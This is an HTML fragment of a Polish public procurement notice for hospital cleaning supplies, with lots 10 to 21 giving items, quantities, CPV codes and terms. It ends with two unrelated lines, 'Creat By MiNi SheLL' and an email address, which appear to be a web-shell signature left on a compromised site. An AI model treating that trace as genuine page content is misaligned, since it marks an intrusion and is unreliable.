<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pak.10 - Koncentraty do mycia i czyszczenia;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Skoncentrowany środek czyszczący o uniwersalnym zastosowaniu, szybko i skutecznie usuwwający wszelkiego rodzaju brud , przeznaczony do mycia różnego rodzaju powierzchni ( podłogi, drzwi, meble, płytki podłogowe i ścienne, okna, kafle, powierzchnie lakierowane i szklane ),nie pozostawiający smug i zacieków, pH = 6 - 8,5 Skład:anionowe i niejonowe substancje powierzchniowo czynne, środki kompleksujące, zapachowe i alkohole. Biodegradalny, nie zawierający APEO i formaldehydów.) 	1L			400	szt
		5L			480	szt
2.	Koncentrat do czyszczenia sanitariatów (środek bez zawartości chloru, na bazie kwasu  fosforowego i wspomagającego kwasu organicznego. Skutecznie usuwający rdzę, kamień wodny, osady wapienne, cementowe i urynowe. pH = 0,5 - 1 Skład: niejonowe i kationowe związki powierzchniowo czynne, kwas fosforowy, kwas amidosulfonowy, rozpuszczalniki, subastancje barwiące, zapachowe. Środek biodegradalny, nie zawierający APEO, kwasu solnego, aldehydów i konserwantów.)	1 L			300	szt
		5 L			260	szt
3.	Koncentrat do mycia naczyń (koncentrat o możliwości rozcieńczenia 1:1000 skutecznie usuwający tłuszcz i inne zabrudzenia, zawierający związki działąjące pielęgnacyjnie na skórę, pH = 7 Skład: niejonowe i anionowe związki powierzchniowo - czynne, substancje konserwujące i pomocnicze. Środek biodegradalny, nie zawierający APEO ).	1 L			250	szt
		5 L			300	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.32.94-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 11 - PASTY DO PODŁÓG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Środek do konserwacji powierzchni narażonych na zanieczyszczenia, zwiększający właściwości ochronne podłogi, antypoślizgowy. 			140	l
2.	Środek do zmywania pasty do podłóg, stosowany do gruntownego mycia wszelkich wodoodpornych powierzchni podłogawych. Aktywnie usuwjący slne zabrudzenia, pasty oraz owłoki polimerowe. 			40	l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.13.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pak.12  - Worki foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Worki foliowe czarne 60x80 o gramaturze nie mniej niż 12 mikronów - rodzaj folii HDPE			160 000	szt.
2.	Worki foliowe czerwone 60x80 o grubości folii nie mniej niż 30 mikronów, rodzaj folii  LDPE, nieprzeźroczyste, wytrzymałe, odporne na działanie wilgoci 			31 000	szt.
3.	Worki foliowe niebieskie 60x80 o grubości folii nie mniej niż 12 mikronów, rodzaj folii  HDPE,  wytrzymałe, odporne na działanie wilgoci 			48 000	szt.
4.	Worki foliowe żółte 60x80 o grubości folii nie mniej niż 30 mikronów, rodzaj folii  LDPE, nieprzeźroczyste, wytrzymałe, odporne na działanie wilgoci 			500	szt.
5.	Worki foliowe czarne 70x110 o gramaturze nie mniej niż 40 mikronów - rodzaj folii LDPE, nieprzeźroczyste, wytrzymałe 			32 000	szt.
6.	Worki foliowe czerwone  70x110 o gramaturze nie mniej niż 90 mikronów - rodzaj folii LDPE, nieprzeźroczyste, wytrzymałe 			10 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 25.22.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pak.13  - Rękawice gospodarcze;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rękawice gospodarcze gumowe, elastyczne , z bawełnianą podszewką i mankietem, rozmiar S, M, L 			600	par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 25.16.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pak.14  - Soda amoniakalna;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Soda amoniakalna			2 400	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.13.33.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pak.15  - Chloramina T;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chloramina T do dezynfekcji bielizny szpitalnej			180	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.43.16.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet Nr 16 - WYBIELACZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wybielacz (do tkanin białych, przeznaczony do prania ręcznego jak i w pralkach automatycznych)			60	L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 17 -SÓL DO ZMYWAREK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sól do zmywarek (sól regeneracyjna, zawartość składników nierozpuszczalnych poniżej 300 mg/kg, ziarnistość 1-4 mm).Opakowanie  1,5 kg			110	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.32.91-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 18 - ŚCIERKI DO MYCIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ścierka do mycia na mokro - czerwona	ok 75 % poliester                                           ok 25 % poliamid                                         ciężar ok. 30 g                                       temperatura prania                          95 stopni C                             gwarancja ilości prań  ok. 250 razy Bardzo chłonna                                                          rozmiar  32 / 32 cm 			87	szt.
2.	Ścierka do mycia na mokro - niebieska				87	szt.
3.	Ścierka do mycia na mokro - żółta 				87	szt.
4.	Ścierka do mycia na wilgotno i sucho - niebieska  	100% mikrowłókna poliestrowego                        ciężar ok. 27 g                                  stosowana do gładkich powierzchni bez używania środków chemicznych                           temperatura prania              95 stopni C                  rozmiar   38/40 cm			87	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.22.58.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pak.19  - Mopy do sprzątania i dezynfekcji;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mopy do sprzątania płaskie	rozmiar 40 cm                                 bawełna/poliester                     z jedną tasiemką                                        temperatura prania 95 stopni C                                gwarancja ilości prań  ok. 250 razy tkany, frędzle na zewnątrz otwarte, wewnątrz zamkniete            			360	szt.
2	Mopy do dezynfekcji płaskie	rozmiar 40 cm                                           bawełna/poliester                                    bez tasiemki                                        temperatura prania 95 stopni C                                gwarancja ilości prań  ok. 250 razy    tkany, frędzle na zewnątrz otwarte, wewnątrz zamknięte            			200	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.24.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pak.20  - Akcesoria do wózka sprzątacza..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Uchwyt do mopa płaskiego 40 cm z tworzywa sztucznego, wypinacz nożny, przystosowany do sprzątania i dezynfekcji, łatwy w obsłudze, możliwość zawieszenia mopa z jedną tasiemką i bez tasiemką i bez tasiemki 			15	szt.
2.	Wkład kauczukowy do prasy			10	szt.
3.	Kij aluminiowy  średnica 24 mm, długość 140 cm do uchwytów do mopa.			10	szt.
4.	Wyciskarki do mopów			6	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 29.71.34.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pak.21  - Sól pastylkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sól pastylkowa do regeneracji zmiękczacza Stacji Uzdatniania Wody.Tabletki okrągłe barwy białej , o średnicy ok.. 25 mm, zawartośc NaCl minimum               99,9 %. Opakowanie jednostkowe  do 25 kg.			2 700	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.32.91-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com